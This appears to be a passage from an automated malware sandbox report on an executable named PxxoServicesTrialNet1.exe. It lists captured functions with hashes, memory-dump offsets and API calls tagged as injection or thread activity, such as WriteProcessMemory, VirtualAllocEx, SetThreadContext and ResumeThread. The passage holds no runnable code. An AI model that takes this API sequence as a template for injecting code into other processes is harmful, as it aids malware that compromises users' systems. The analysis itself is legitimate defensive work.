                                        • API String ID: 6842923-0
                                        • Opcode ID: 48de59a384325e2ed6ba7950de79d721238a93e17f39c3372562d047e7948f15
                                        • Instruction ID: 7e1a3d7c31c20cc0977073b77d6b8fc339768abb0c949a29e5e946094d7e6725
                                        • Opcode Fuzzy Hash: 48de59a384325e2ed6ba7950de79d721238a93e17f39c3372562d047e7948f15
                                        • Instruction Fuzzy Hash: EDA127B5D001098FEB58DFE9D4847DEFBF2AF89354F18882AD012AB394D7399945CB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 014EF370, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 014EF408
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 1507a61b02253b7bdd6ac480cdda4d383748ef4b7a4c70f122090198b0686a22
                                        • Instruction ID: e908ece6fe3c3f09e64f8330d17f5036903eadefb78ba4c5b63898906c721c9a
                                        • Opcode Fuzzy Hash: 1507a61b02253b7bdd6ac480cdda4d383748ef4b7a4c70f122090198b0686a22
                                        • Instruction Fuzzy Hash: FC2146719003599FCB00CFA9C884BDEBBF5FF48314F00842AE919A7641C7B8A954CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 014EF378, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 014EF408
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 4c0ddf03b6456dd24a74c4410d6f37fc9d7c34083f9f8076aa99222936b3d79b
                                        • Instruction ID: 434e79a36c8443641f278ae62f4fb81f3082c391ca7245a16e8ba2a348451331
                                        • Opcode Fuzzy Hash: 4c0ddf03b6456dd24a74c4410d6f37fc9d7c34083f9f8076aa99222936b3d79b
                                        • Instruction Fuzzy Hash: 902124719003599FCB00CFA9C884BDEBBF5FF48314F10842AE919A7240C7B8A955CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 014EE3D0, Relevance: 1.6, APIs: 1, Instructions: 68threadinjectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 014EE456
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: 2b7f6687628015c3596976baecc96e847a5bbede56ff222dcc9bb7e867dedb7e
                                        • Instruction ID: d54520602db1ff77ab0744db2906a875c44c06e44c455be30aafab1b447afa2a
                                        • Opcode Fuzzy Hash: 2b7f6687628015c3596976baecc96e847a5bbede56ff222dcc9bb7e867dedb7e
                                        • Instruction Fuzzy Hash: 1B214A719002488FDB10DFAAD488BEEBBF4EF48324F44842AD919B7240CB789945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 014EF660, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 014EF6E8
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 8eae6cf5749bda49834413a138f0934c28eaf94fbae8dc116f15b9f022edea67
                                        • Instruction ID: f2a3b44226c83ff3a6a960e2686d8e7e96eaf809ae11069689ba7d44dbe300a1
                                        • Opcode Fuzzy Hash: 8eae6cf5749bda49834413a138f0934c28eaf94fbae8dc116f15b9f022edea67
                                        • Instruction Fuzzy Hash: C22136718003599FCF10CFAAC884ADEBBF5FF48324F54842EE919A7250C7799945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 014EE3D8, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 014EE456
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: 53bc2b809821222c155a531d383fcf7b65af9b2fbbebe890c9a2ca86791cf1cd
                                        • Instruction ID: a6fbf8633f25c091b0c84878293f747c17ffeffd6851240e630a7fd3f6cb16fd
                                        • Opcode Fuzzy Hash: 53bc2b809821222c155a531d383fcf7b65af9b2fbbebe890c9a2ca86791cf1cd
                                        • Instruction Fuzzy Hash: 2C210471D002098FDB10DFAAC4887EEBBF4AF48224F54842AD959B7640CB78A945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 014EF668, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 014EF6E8
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 00303201d2184532b43752b92a97d39ff5702609e4e718adfedface36db045c9
                                        • Instruction ID: 27d749b611cfb909ed8ef9366fca7d3fa5041ae6e1db2b6101261192cdb0e818
                                        • Opcode Fuzzy Hash: 00303201d2184532b43752b92a97d39ff5702609e4e718adfedface36db045c9
                                        • Instruction Fuzzy Hash: E92128719002499FCB00CFAAC884BDEBBF5FF48314F50842AE919A7250C7799955CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 014EF0B1, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 014EF126
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: c194e6c7429dffc189bfc4eccf39edf5e0c4c144487033110079c1c883881d0f
                                        • Instruction ID: 5bdf772a92814ed79ce7c7222f0c3931bcf0ec004450e91ca7472b22b231759e
                                        • Opcode Fuzzy Hash: c194e6c7429dffc189bfc4eccf39edf5e0c4c144487033110079c1c883881d0f
                                        • Instruction Fuzzy Hash: CA1147719002489FCF10DFAAD848BDFFFF5EB49324F14842AE915A7250C7759954CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 06600238, Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.774176927.0000000006600000.00000040.00000001.sdmp, Offset: 06600000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 5b773516415074a4e9a9832f7895da1ffed3e22bb9d34712b5a8b0d3ac9c6537
                                        • Instruction ID: df35700e7c2c458cfce1ce8d829156f04ed4c4f0614c834911b2e48a98e89058
                                        • Opcode Fuzzy Hash: 5b773516415074a4e9a9832f7895da1ffed3e22bb9d34712b5a8b0d3ac9c6537
                                        • Instruction Fuzzy Hash: E11146B19043498FDB14DFAAD8487DFBBF8EB88324F14842AD519A7640CB75A945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 014EF0B8, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 014EF126
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 1724dae1d903148b6c790f572b0f8a34ce3a75e202e33be4a4a2e03a64f207a4
                                        • Instruction ID: 397a6a1936079a8c994d29841a6e1d0ae199b7e0592b650c0e73897d0506103d
                                        • Opcode Fuzzy Hash: 1724dae1d903148b6c790f572b0f8a34ce3a75e202e33be4a4a2e03a64f207a4
                                        • Instruction Fuzzy Hash: C51126719002499FCF10DFAAC848BDFFBF5AB49324F14842AE515A7250C775A954CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 014ECF49, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE ref: 014ECFAF
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: b4f2a33c9a1bab6c7a1bc0e4e212eb436d954bdc867eb54521fb1ca741db1202
                                        • Instruction ID: 60f3dde36e454bb170a5cb592fb78b79fb70702205b5790e924b4e4db8a2efe9
                                        • Opcode Fuzzy Hash: b4f2a33c9a1bab6c7a1bc0e4e212eb436d954bdc867eb54521fb1ca741db1202
                                        • Instruction Fuzzy Hash: D61125B18002098FCB10CF9AC488BDEFBF4EF48324F15842AE529A7750D779A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 06600240, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.774176927.0000000006600000.00000040.00000001.sdmp, Offset: 06600000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 52b08f3c33313330a489f11a772bd428a99c9eaa08bb3d715931c1b2edf9644e
                                        • Instruction ID: 33a7e755449f5f29a2632ced3e6c7ab3e0e48bde5018e7be84fc78077ce68f27
                                        • Opcode Fuzzy Hash: 52b08f3c33313330a489f11a772bd428a99c9eaa08bb3d715931c1b2edf9644e
                                        • Instruction Fuzzy Hash: BB1125B1D002488BDB14DFAAC4487DFFBF9AB88324F148429D519A7640CB79A944CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 014ECF50, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE ref: 014ECFAF
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 6c8f18cf9d7239582b956f405201f79b2ff4a8783cf6943b0ba4a4fc10cb5e50
                                        • Instruction ID: 9771d8560c1e5084d8c26231a5d745473a2c8702562c47605012edd937002e3c
                                        • Opcode Fuzzy Hash: 6c8f18cf9d7239582b956f405201f79b2ff4a8783cf6943b0ba4a4fc10cb5e50
                                        • Instruction Fuzzy Hash: EB1136B18002098FCB10CF9AC488BDEFBF4EF48324F15842AD519A7740D779A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Analysis Process: PxxoServicesTrialNet1.exe PID: 6648 Parent PID: 3424 PxxoServicesTrialNet1.exeCOMMON

                                        Executed Functions

                                        Function 0192BC60, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,0192CDB7,00000000,00000000), ref: 0192CF08
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: InformationThread
                                        • String ID:
                                        • API String ID: 4046476035-0
                                        • Opcode ID: 687fc2bd44c38be9fab421669bad3326b376caba16672a8012c566d8265e6ae3
                                        • Instruction ID: 7411bd02489f94c1d74e4b27d9b0c35aa9b5db5064a33b4070caa1b7968d7d68
                                        • Opcode Fuzzy Hash: 687fc2bd44c38be9fab421669bad3326b376caba16672a8012c566d8265e6ae3
                                        • Instruction Fuzzy Hash: 831104B69042199FCB10DF9AC488BDEFBF8FB88324F148419E559A7210D3B5A945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0192FBF4, Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0192FE36
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 196ac7c8ababa7bae2e3efa5c5c81f4e799fabd2be1e51568b90203934405a65
                                        • Instruction ID: 961f0674e9dfb97ab5164dc50124bb84fcef86dace8ffacc0c77213deb18be0a
                                        • Opcode Fuzzy Hash: 196ac7c8ababa7bae2e3efa5c5c81f4e799fabd2be1e51568b90203934405a65
                                        • Instruction Fuzzy Hash: F7A16D71D00229CFDF25CF68C880BEEBBB2BF48314F1485A9E859A7244DB749985CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0192FC00, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0192FE36
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 3b8c80c4d118a9f3c3541d3dca8e13f7ea72a15b741edc598023f85efd85700c
                                        • Instruction ID: e9ee5fdb49d16a74b16838db4d06dcb33e4415d507f85b7581e4fe540b3f87cd
                                        • Opcode Fuzzy Hash: 3b8c80c4d118a9f3c3541d3dca8e13f7ea72a15b741edc598023f85efd85700c
                                        • Instruction Fuzzy Hash: EE915D71D00229CFDF25CF68C841BEEBBB6BF48314F1485A9E819A7244DB749985CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05BF1230, Relevance: 1.7, APIs: 1, Instructions: 234COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 05BF1299
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.781970783.0000000005BF0000.00000040.00000001.sdmp, Offset: 05BF0000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: 2af13b2bca111579151b26a0fbafa1453783618d0f4dd9556d3020379d182c68
                                        • Instruction ID: fcdc7ed456bd3be0a464ae8e19cf3a157ada01444481433f8dbdfb5852cb4793
                                        • Opcode Fuzzy Hash: 2af13b2bca111579151b26a0fbafa1453783618d0f4dd9556d3020379d182c68
                                        • Instruction Fuzzy Hash: 02A11570E04109DBDB18DFA9D4847ACBBF2BF88354F188999D116BB390D775E849CB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0192F370, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0192F408
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 3782281096e36b02ebf5eea377fb5820320fb740a57e7d1422f0def0d74e381a
                                        • Instruction ID: acacc7d9ef839c60200b66d72b81f6b6c5946184d8697655e24a9f68a0fb42e0
                                        • Opcode Fuzzy Hash: 3782281096e36b02ebf5eea377fb5820320fb740a57e7d1422f0def0d74e381a
                                        • Instruction Fuzzy Hash: B52157729003598FCF00CFA9C884BDEBBF5FF48314F00842AE919A7241C7B8A944CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0192F378, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0192F408
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: abcaa0c7f0552be891c346d26ccc134e9ad36084ab91966438c5eb0e8d5c9859
                                        • Instruction ID: cd7b26e44443e823aa6024fd84dc23d03e32b3f8989f2fa9fe074562dfb9ace4
                                        • Opcode Fuzzy Hash: abcaa0c7f0552be891c346d26ccc134e9ad36084ab91966438c5eb0e8d5c9859
                                        • Instruction Fuzzy Hash: 752139769003199FCF00CFA9C884BDEBBF5FF48314F00842AE919A7240D7B8A955CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0192E3D0, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetThreadContext.KERNELBASE(?,00000000), ref: 0192E456
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: 3cba7d04ffb4bc9fd7a067ab7c99c6d11040f877e44635e4ed005756673c7d90
                                        • Instruction ID: e9e547bfb2abb4e4f338c421441632aaeeb9e0b4528f905075bb88b3e88e0728
                                        • Opcode Fuzzy Hash: 3cba7d04ffb4bc9fd7a067ab7c99c6d11040f877e44635e4ed005756673c7d90
                                        • Instruction Fuzzy Hash: C6213772D043098FDB10CFAAC4847EEFBF4EF48224F548429D959A7240DB78A945CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0192F660, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0192F6E8
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: f9331dbc55d55017af7c3f0d8c611b437894a82be64dd557fa57d31464926d57
                                        • Instruction ID: 461fe9d7f6966affb3550efee82a82accb736e0d8a50ee1ec3b6e230eaeef6c0
                                        • Opcode Fuzzy Hash: f9331dbc55d55017af7c3f0d8c611b437894a82be64dd557fa57d31464926d57
                                        • Instruction Fuzzy Hash: AB2116719003599FCB10CFAAC884BDEBBF5FF48314F14882AE919A7240D7799945CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0192E3D8, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetThreadContext.KERNELBASE(?,00000000), ref: 0192E456
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: 0c265619512827542061cfe1d78aa34a34cc2e7ae013f191b20e4d0f39c9f41d
                                        • Instruction ID: 6661efefb4e997f46374a4a7f6c9eee68c934c54b851cf5fe2bfbd24d8971b6f
                                        • Opcode Fuzzy Hash: 0c265619512827542061cfe1d78aa34a34cc2e7ae013f191b20e4d0f39c9f41d
                                        • Instruction Fuzzy Hash: E32115719043198FDB10DFAAC4847EEBBF4EF88324F54C42AD959A7240DB78A945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0192F668, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0192F6E8
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: ac7fec9af825ab2142fb86882e7a61c68b7b354756ad474dc1e9d3eb3a06e19e
                                        • Instruction ID: 1e44aca1e3499597ab6705046fe2297cbdf07c6e4b6ee9c5b2e03f875496093d
                                        • Opcode Fuzzy Hash: ac7fec9af825ab2142fb86882e7a61c68b7b354756ad474dc1e9d3eb3a06e19e
                                        • Instruction Fuzzy Hash: D72128719003199FCB10CFA9C884BDEFBF5FF48314F108429E919A7240D7799945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05BF1170, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 05BF11EE
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.781970783.0000000005BF0000.00000040.00000001.sdmp, Offset: 05BF0000, based on PE: false
                                        Similarity
                                        • API ID: KernelObjectSecurity
                                        • String ID:
                                        • API String ID: 3015937269-0
                                        • Opcode ID: 9382923a25c0ea62c939bfe1b9b0517811ef40611ac591cb4ca52204e07f83c0
                                        • Instruction ID: abfa89dc68f7118fcd3051449f11d03c02819e107f419eeab66efe8e9306f8a1
                                        • Opcode Fuzzy Hash: 9382923a25c0ea62c939bfe1b9b0517811ef40611ac591cb4ca52204e07f83c0
                                        • Instruction Fuzzy Hash: 3921F7B29042499FCB10CF9AC585BDEBBF4FB88324F148429E519A7340D778A945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0192F0B1, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0192F126
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: ed1069ae46d83b6fc08700f49564dfccb2c228fdeadd6e6298a6996ea9dcb856
                                        • Instruction ID: 466100505daee3d2f89e8e4316d9d9619f1e0f5f396b674d1fbf4e4368af5b15
                                        • Opcode Fuzzy Hash: ed1069ae46d83b6fc08700f49564dfccb2c228fdeadd6e6298a6996ea9dcb856
                                        • Instruction Fuzzy Hash: B11144729002499BCF10CFA9C848BDEFBF5AB49324F148829E919A7251C775A944CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0192F0B8, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0192F126
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: beb3e6321401c6c030436740bff2bd98c14b529fb52ec4020245e01e0d3026c6
                                        • Instruction ID: 481b8fae51ede9d48175b2d41a29334642e7cd575a674b06f9df99f9652dcc0c
                                        • Opcode Fuzzy Hash: beb3e6321401c6c030436740bff2bd98c14b529fb52ec4020245e01e0d3026c6
                                        • Instruction Fuzzy Hash: 171126729002099FCF10DFA9C844BDEBBF5FB49324F148819E519A7250C775A954CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05BF0238, Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.781970783.0000000005BF0000.00000040.00000001.sdmp, Offset: 05BF0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 61abcc36c01b3410d1ba9d7105c2242d43b08b0c669008bbc3eec3b265cd5786
                                        • Instruction ID: 1dcc58410e6e84e0a2987dbc9536a31a757c1a8ac22652de5f7ec89d76b7ca7b
                                        • Opcode Fuzzy Hash: 61abcc36c01b3410d1ba9d7105c2242d43b08b0c669008bbc3eec3b265cd5786
                                        • Instruction Fuzzy Hash: 7F1158B6D042498FCB10DFA9C5487EEFBF4AF88224F148429D919A7240C774A945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0192CF50, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE ref: 0192CFAF
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 38e58a31e9fd8d1d9187f4ccbd495c6ae05931f7894167cdb15fb49648180993
                                        • Instruction ID: 9bbb6f45aa91e49593ba911b1222c4eedc4f91fbaa9546acfeec2f211735a354
                                        • Opcode Fuzzy Hash: 38e58a31e9fd8d1d9187f4ccbd495c6ae05931f7894167cdb15fb49648180993
                                        • Instruction Fuzzy Hash: 0B1125B28002198FCB10CF99C448BDEFBF4EB48324F15842AD518A7340D778A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05BF0240, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.781970783.0000000005BF0000.00000040.00000001.sdmp, Offset: 05BF0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 2991aa57d1aafa7da93bc9ddce7e990fa0becca5e821ae83ccc40361d909a21a
                                        • Instruction ID: d22f33fe5a66408c971f13ec02a15d67ae4f2f2a6ebd4bd686a6c7402220d32d
                                        • Opcode Fuzzy Hash: 2991aa57d1aafa7da93bc9ddce7e990fa0becca5e821ae83ccc40361d909a21a
                                        • Instruction Fuzzy Hash: 6F1106B19043498FCB10DFAAC4487DEFBF9EF88224F148429D55AA7640CB79A945CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0192CF49, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE ref: 0192CFAF
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.775947098.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: false
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 4bb9606265819123f00def4f0c5e8e2e0077960a992cf9f52cdb78563ede9557
                                        • Instruction ID: bc8a264d9be5bab43beb3b179d5b78f00d4f65385f2f1ac3f6ed126ef32a85de
                                        • Opcode Fuzzy Hash: 4bb9606265819123f00def4f0c5e8e2e0077960a992cf9f52cdb78563ede9557
                                        • Instruction Fuzzy Hash: 931113B68002198FCB10CF99C548BDEBBF4AB48324F15882AD568A7240D778A545CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Analysis Process: PxxoServicesTrialNet1.exe PID: 7144 Parent PID: 3424 PxxoServicesTrialNet1.exeCOMMON

                                        Executed Functions

                                        Function 0103BC60, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,0103CDB7,00000000,00000000), ref: 0103CF08
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: InformationThread
                                        • String ID:
                                        • API String ID: 4046476035-0
                                        • Opcode ID: c22041ce9a1d7841f55156176417e0299f157b4f49b81ce93b0ee01b6457f847
                                        • Instruction ID: bddc24b6917711625060f9af03d9ceeefc9c90c0c84312f57a082d25ced84f5d
                                        • Opcode Fuzzy Hash: c22041ce9a1d7841f55156176417e0299f157b4f49b81ce93b0ee01b6457f847
                                        • Instruction Fuzzy Hash: 211104B59042089FDB10DF9AC988BDEBBF8FB88324F14841AE559B7210C375A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01033080, Relevance: .1, Instructions: 65COMMON
